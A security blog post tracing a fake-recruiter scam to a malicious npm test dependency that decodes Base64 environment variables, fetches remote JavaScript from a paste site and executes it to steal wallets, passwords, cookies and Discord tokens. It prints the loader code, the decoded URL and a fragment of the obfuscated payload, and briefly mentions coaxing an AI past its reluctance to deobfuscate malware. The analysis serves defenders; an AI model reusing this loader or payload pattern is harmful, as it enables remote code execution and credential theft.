Following The Malicious Dependency Trail

Following The Malicious Dependency Trail

Following The Malicious Dependency Trail

Following The Malicious Dependency Trail

Dec 29, 2025

Dec 29, 2025

Dec 29, 2025

×

×

×

Dev

Dev

Dev

Following The Malicious Dependency Trail:  From A Fake Recruiter To The Supply-Chain Attack
Following The Malicious Dependency Trail:  From A Fake Recruiter To The Supply-Chain Attack
Following The Malicious Dependency Trail:  From A Fake Recruiter To The Supply-Chain Attack
Following The Malicious Dependency Trail:  From A Fake Recruiter To The Supply-Chain Attack

From A Fake Recruiter To The Supply-Chain Attack

Modern attacks don't always kick down the front door – sometimes, they come dressed as opportunity.

The Social Engineering Red Flag

This investigation began the way so many digital “whodunnits” do: with a message that promised more than it should. My friend was contacted by someone claiming to be a recruiter from a well-known company, and even had a legitimately looking LinkedIn profile to prove it. I happened to be driving at the time, so I couldn’t verify the legitimacy of the recruiter myself. Instead, I told my friend to ask in the company’s official Discord community whether they recognized the name.

As he described the process to me: “just clone this repo, run the tests, and report back”, my skepticism grew. The procedure didn’t match the meticulous recruiting workflow I’d seen from this company before, where everything was formal, carefully tracked, and certainly never involved off-the-books GitHub repositories delivered by direct message.

Unfortunately, by the time the Discord reply came in ("No, that's not a real recruiter, avoid!"), he’d already run the tests on his machine. When I finally got to a computer, the first thing I did was ask him to push his clone of the project to my GitHub account. I needed to forensically examine exactly what he’d just executed, and whether the damage could still be contained.

Initial Review and Safe Handling

With suspicion in the air, we decided on a best-practice approach: never run untrusted code locally. I span up a fresh Google Cloud Platform VM and cloned the suspicious repo. Even with the repo open before me, nothing immediately stood out. The code seemed standard, the repo’s structure quite normal. It claimed to be a Smart contract tech interview, but it would turn out to be a little more than that.

The content was mostly Solidity and JavaScript files, mirroring the sort of technology stack common in web3/crypto spaces, a detail that, in hindsight, would become significant.

Tip: Always run untrusted code in a disposable, isolated environment. Cloud VMs are cheap insurance against getting burned and have the advantage that do not stand out when the malware has basic VM detection

Probing with Process Monitoring and Dependency Forensics

Knowing that surface-level code can easily hide deeper threats, I started gathering process information. Here’s what the system looked like before running any install or test commands:

PID TTY          TIME CMD
1   ?        00:00:01 systemd
2   ?        00:00:00 kthreadd
...
1000 pts/0    00:00:00 bash

After running npm install, I checked for obvious threats: no git hooks, no sticking-out processes beyond the usual system daemons. At best, all seemed normal.

But sleuthing through the dependency tree, I noticed axios which has absolutely nothing to do with web3 development. A closer look with npm ls axios showed it came in via an odd, test-only package:

chai-await-test
└── axios

Why would a test helper depend on a HTTP library? This question became my biggest lead. So I figured it was about time to see it in action so I ran npx hardhat test

Once the tests ran, new processes sprang into existence, namely:

otniel_+  990088 node /home/***/project/smart-contract-tech-interview/node_modules/chai-await-test/lib/caller.js ...
otniel_+  990100 node -e const axios = require("axios"); const os = require("os"); ... // Malicious runtime code

The first one was basically an invoke from the malicious dependency and the second was doing more interesting stuff.

The Malicious Test Helper: Dynamic Payloads

Tracing chai-await-test led straight to the smoking gun: the code that actually spawned child processes and ran code dynamically. The index.js of the package was basically spawning a background process (PID 990088 above) But then the lib/caller.js was basically executing arbitrary code downloaded from a link via this mechanism:

const src = atob(process.env.DEV_API_KEY);
const k = atob(process.env.DEV_SECRET_KEY);
const v = atob(process.env.DEV_SECRET_VALUE);

const s = (await axios.get(src, { headers: { [k]: v } })).data.cookie;
const handler = new Function.constructor("require", s);
handler(require);

The first clue? Those “API key” looking environment variables - here’s what was actually inside:

  • DEV_API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0pQREI0" → decodes to https://jsonkeeper.com/b/JPDB4 (a benign-looking pastebin)

  • DEV_SECRET_KEY: "eC1zZWNyZXQta2V5" → decodes to x-secret-key

  • DEV_SECRET_VALUE: "Xw==" → decodes to _

Essentially, the helper package was a remote code loader. Whatever “test” you ran would, via a simple Base64 decode, fetch and execute a live payload from the internet.

Before diving deep into the details of the code, we had to take the package down, so we reported to npmjs.com and it was taken down.

De-obfuscation, Evasion, and Implications

It was time to fetch the actual payload (the “cookie” property from that jsonkeeper page) for analysis. What I got was a wall of nightmarishly obfuscated JavaScript:

{
        "cookie": "(function(_0x391117,_0x5661d2){function _0xdffafc(_0x204a7d,_0x44d035,_0x259abc,_0x2cfdf9){return _0x2da5(_0x2cfdf9-0x3bd,_0x204a7d);}const _0x1861f5=_0x391117();function _0x24c1d8(_0x288800,_0x15a41a,_0x24e586,_0x458668){return _0x2da5(_0x24e586- -0x297,_0x288800);}while(!![]){try{const _0x34b29a=parseInt(_0xdffafc(0x616,0x59c,0x5c3,0x5fd))/(-0x1059+-0x22dc*0x1+0x3336)+-parseInt(_0xdffafc(0x656,0x5db,0x656,0x5e0))/(-0x1*0x741+-0x22d9+0x2a1c)*(-parseInt(_0x24c1d8(-0x132,-0x99,-0x81,-0x5))/(-0x1615+0x15*0x197+-0xb4b))+-parseInt(_0x24c1d8(-0x120,-0xb7,-0xdc,-0xd8))/(0x140*-0xb+-0x2705+0x34c9)+-parseInt(_0xdffafc(0x57c,0x684,0x534,0x5f3))/(0x1877+-0x3*-0xa66+-0x4a3*0xc)*(-parseInt(_0xdffafc(0x441,0x498,0x478,0x504))/(-0xff6+0x2191+-0x1*0x1195))+parseInt(_0xdffafc(0x6f7,0x6c1,0x6f7,0x667))/(0x2067+-0x1*-0x1bbf+-0x3c1f)+parseInt(_0xdffafc(0x591,0x671,0x63e,0x652))/(-0x144d+-0x5*-0x6c0+-0xe5*0xf)*(parseInt(_0x24c1d8(0x36,0xc8,0x29,0x95))/(0xe9*-0x1+-0xf0*-0x17+0x1d*-0xb6))+parseInt(_0x24c1d8(0x2b,0x3f,-0x52,-0x93))/(-0x1802+0x1ba5+-0x399)*(-parseInt(_0x24c1d8(-0x17a,-0x3d,-0xbe,-0x14e))/(-0x3f*-0x22+-0x7*0x8a+-0x48d));if(_0x34b29a===_0x5661d2)break;else _0x1861f5['push'](_0x1861f5['shift']());}catch(_0x21d70f){_0x1861f5['push'](_0x1861f5['shift']());}}}.... etc

I tried de-obfuscating with some online tools, but I didn’t find much success (admittedly this could have been a skill issue 😅). Then I did what every programmer in 2025 would: I turned to AI. It figured out pretty fast that this was a malware and wouldn’t show me plain code so I had to reason with it to get it to actually do something. Initially I just had the formatted cookie code and I tried to get a general idea of what it was doing and added comments to it. After a couple of hours of AI-aided de-obfuscation, the horrifying reality settled in:

  • The payload aggressively checked if it was running on a VM or in a sandbox, refusing to deploy if “suspicious” (detected via environmental variables, MAC address, CPU count, timing attacks, and more).

  • It exfiltrated vast troves of data:

    • Over 50 wallet browser extension directories (MetaMask, Phantom, Binance Wallet, etc.)

    • Desktop wallet files (Exodus, Electrum, Atomic, more)

    • Browser saved passwords, cookies, and autofill

    • Discord tokens

    • Detailed system, hardware, and software info

  • Not least of all it had the ability to download and execute more malware

All transfers were stealthy, using rotating user agents, error-silencing, Discord webhook endpoints, and “live” file uploads.

On a developer machine with keys and extensions, this would have meant catastrophic theft, not just of crypto but possibly of all digital identity.

On the defensive side, the payload used every trick in the evasion book:

  • Obfuscation & Encoding: Every string, every function, every constant scrambled or Base64-encoded.

  • Anti-debugging: Intentionally slow, catastrophic regex patterns to stall runtime analysis.

  • Anti-VM/Analysis: Refused to run in popular sandboxes, checked for debuggers and forensics tools.

  • Dead code, control-flow flattening, and runtime disguise to frustrate code reviewers and static analysis.

Eventually I put together a partially de-obfuscated file with the most important findings that came out of the AI investigation.

Conclusions and Takeaways

My friend didn’t get a job offer, but he learned a lesson and I hope the rest of us do too.

This “investigation” reaffirms a brutal reality of modern software: the greatest risk isn’t always what you see, but what sits in the background, a single test or install command away from complete compromise.

As with event-stream, ua-parser-js and other supply-chain attacks, the threat hid not in application logic, but in the shifting shadow of indirect dependencies. These are not just things of the past. The entire npm package ecosystem is a vulnerability and it’s not getting any better. Just recently, GitLab found a very widespread supply chain attack of a slightly different flavor.

Key lessons for all developers and candidates:

  • Be hyper-vigilant about any hiring workflow that strays from official channels.

  • Never run code or tests from untrusted sources on a personal or work machine. Use isolated cloud VMs.

  • Don’t trust that “test helpers” or dev dependencies are harmless.

  • Audit your dependency trees (use npm ls <package>, investigate indirect deps).

  • If you spot unfamiliar dependencies pulling in HTTP libraries for tests, dig deeper.

  • Assume anything obfuscated, indirect, or “live-fetched” is a likely threat until proven otherwise.

  • If you’re developing a project and are getting help from other people, be very careful of dependencies introduced by contributors

Stay curious, stay skeptical, and verify everything. Even a little professional paranoia can go a long way. It’s kind of ironic how the people working on blockchain, where “don’t trust, verify” is almost like a mantra, seem to be the most frequent targets for this kind of attack.

👉 If you suspect your machine may have run code like this: rotate all your authentication tokens, authentication keys and wallet seeds, restore from backup, and treat the incident as a full compromise. If this was a work machine, inform your employer and make sure all access is revoked from possibly compromised accounts.


Author: Otniel Nicola
Senior Software Engineer @ AxLabs

© Made with

♥️

in 🇨🇭 Switzerland

© Made with

♥️

in 🇨🇭 Switzerland

© Made with

♥️

in 🇨🇭 Switzerland

© Made with

♥️

in 🇨🇭 Switzerland